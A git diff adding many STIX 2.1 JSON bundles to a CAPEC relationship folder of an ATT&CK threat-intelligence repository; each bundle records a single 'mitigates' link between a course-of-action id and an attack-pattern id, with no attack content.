diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json
new file mode 100644
index 0000000000000000000000000000000000000000..edeb45c46b6a7d8f4da151e64bc1c532d767e7f7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e351819c-a8ce-4628-bc2d-fe25172f524f.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--c74a050e-ad3d-41a6-9e21-ff2e2ce4b049",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e351819c-a8ce-4628-bc2d-fe25172f524f",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--60c73cc1-5718-4246-a2a6-da180705e463",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json
new file mode 100644
index 0000000000000000000000000000000000000000..4ac348e63451782ca7b362dedc6610352c286d20
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--33f25821-76ba-486c-91fa-d9786a57c02d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e5a3a69d-5435-4dc8-a832-08dc60fcbd8f",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json
new file mode 100644
index 0000000000000000000000000000000000000000..efac0f3b36fe3f3bf24689d7cb679a63152bd5cc
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--e8e7946c-f260-48f6-8601-b5bd6d149921.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--4894389e-84ce-4b39-aa10-53fc83dc9f12",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json
new file mode 100644
index 0000000000000000000000000000000000000000..dd88ab66aa37cb2812b8b883c0862941040ca44a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eb4b5528-6e2e-4670-bfd3-983606f61020.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--e919c6c0-9161-4205-8292-a661f6cb4d1e",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json
new file mode 100644
index 0000000000000000000000000000000000000000..a13f63c6a19055baadb73f83e622c4e214c5c669
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--308a297f-e4e0-4b51-bfc1-5be7b6d09fd4",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--ed0e71de-8def-40f3-9a63-1cdcb946c954",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--2b7572ea-6dc7-4734-810a-1dd9611f435e",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json
new file mode 100644
index 0000000000000000000000000000000000000000..59a08f82d4b000272c4a7052c804b0ba960e9513
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--088bc281-c39e-4d2b-afb2-c5a08393dff2",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json
new file mode 100644
index 0000000000000000000000000000000000000000..f08b5e19e72d59e360ea0f29c164a52426efa893
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--9a946e5c-fe08-44de-9869-33d2170f890b",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json
new file mode 100644
index 0000000000000000000000000000000000000000..39b26d1a912a561ab35df354b9e59ae8e30d6191
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--0aa2aca4-71d6-4db4-90f0-11f630c74e91",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json
new file mode 100644
index 0000000000000000000000000000000000000000..1eeb641352d191c59cdb6d6a2bd81df2599661ca
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f41d0244-df5c-41e8-9fd1-046642dd7609.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--791bb7ca-c21b-40d2-b533-ec5e4022eaf9",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f41d0244-df5c-41e8-9fd1-046642dd7609",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--022f6443-4421-4a54-beb6-d471aad577cb",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--326dfb79-2d81-406a-9977-79e67d8de6e2",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json
new file mode 100644
index 0000000000000000000000000000000000000000..3d9fe9d5b98c3627b4c0110ef76fb322622b0ec9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f658c186-a394-490c-bb78-04d615494813.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--3f44bc98-12fe-449b-a673-4734cc9aecaa",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f658c186-a394-490c-bb78-04d615494813",
+ "modified": "2020-12-17T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json
new file mode 100644
index 0000000000000000000000000000000000000000..227f414629fac3212222f52da4de0fcbfaff35a4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--f81ec05a-9f11-45a6-867c-62b54d1514de.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--71821369-b289-4d9a-ac26-055866e11c8f",
+ "objects": [
+ {
+ "created": "2023-01-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--f81ec05a-9f11-45a6-867c-62b54d1514de",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json
new file mode 100644
index 0000000000000000000000000000000000000000..e252aaa94e26afd791090d13a86c1a536dc928a7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fa96d7c5-a195-4776-8593-4c3da18a0788.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--34a0c651-0cd0-46f2-a133-eb4ab689648d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json
new file mode 100644
index 0000000000000000000000000000000000000000..f4a62e8196676e934897e24fda3b7c443434a234
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fbff3867-2c77-46ca-911a-4348a280a4bb.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--d0839976-3c80-4cd2-8145-7a6534f0f68f",
+ "objects": [
+ {
+ "created": "2021-06-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fbff3867-2c77-46ca-911a-4348a280a4bb",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--58b2d339-c160-4d96-b0fa-3e4dba290713",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json
new file mode 100644
index 0000000000000000000000000000000000000000..3f7faaec54b1ff0e07a1f62800d6f105c1880773
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--44ae8b92-17d6-48df-a962-3f62319abc84",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fd59e3fd-3d5b-455c-8cdc-46f9ce5cd274",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json
new file mode 100644
index 0000000000000000000000000000000000000000..976c0a83fc428e85886233d5f77bc9456945b86c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--8e31fb43-4336-4fbb-b177-347487341b2d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fd9e7627-0b39-4948-90a3-d4d2f54da8d8",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--b173381f-e049-4ddb-b252-3cd3e9860f04",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json
new file mode 100644
index 0000000000000000000000000000000000000000..9d5db06991115a42d4533fda4b2a9f0f94839d33
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--e8e18878-0298-4c73-8a9d-b5f686aa1e95",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fe0aa95f-a1b5-4d8a-a02e-4852e5d15072",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--1480541a-b7e2-4b3d-a3c5-f13287033d55",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json
new file mode 100644
index 0000000000000000000000000000000000000000..c2db5fcc166484ff4ba3c0e4557646bd9d40a39d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--75cb1cfe-2b07-45fa-94d5-5ad0249d66a1",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fe0d37e0-76e8-4a75-bbf0-61cf3bfe11d4",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--61ede338-8195-4a10-aefe-e52224f13800",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--dbe3513a-5527-4aaf-a463-ead5eae2967f",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json
new file mode 100644
index 0000000000000000000000000000000000000000..4a0b7ede81f7a902ce633340396ae0fd764bfa72
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe330f06-2741-49df-9e82-3eea2c36031c.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--628797ec-993b-493a-b3a9-eb91870db3dc",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fe330f06-2741-49df-9e82-3eea2c36031c",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--515c3742-c198-44f2-bc02-7b6e8959db8d",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json
new file mode 100644
index 0000000000000000000000000000000000000000..12db406ae56a43ac516fe2c8cc23867231c2b6f4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e.json
@@ -0,0 +1,21 @@
+{
+ "id": "bundle--ffdac612-7cce-44a0-b4fd-23829250f1b9",
+ "objects": [
+ {
+ "created": "2023-01-24T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "id": "relationship--fe4286f2-275d-4a1f-b28e-f40a30bde64e",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "relationship_type": "mitigates",
+ "source_ref": "course-of-action--dff06017-2189-4ee8-875b-d7c722ceb8fb",
+ "spec_version": "2.1",
+ "target_ref": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973",
+ "type": "relationship",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json
new file mode 100644
index 0000000000000000000000000000000000000000..64055cb2b7b4fd3bdb9a2a0cff239a49b32ee8dd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80.json
@@ -0,0 +1,21 @@ +{ + "id": "bundle--13576bcc-7c76-4e07-afa1-faf8b438d4c1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json new file mode 100644 index 0000000000000000000000000000000000000000..49b27491f98a7302c0ceb9d42d2e30bfb30b65de --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--6902692c-b3b6-447a-9d7d-cfe9f2d1d630", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "spec_version": "2.1", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json new file mode 100644 index 0000000000000000000000000000000000000000..e5864c4b4c0dc537f970041217660619c7145bc4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/relationship/relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--ef9d597b-2771-4789-9e62-43172983eaf5", + "objects": [ + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git 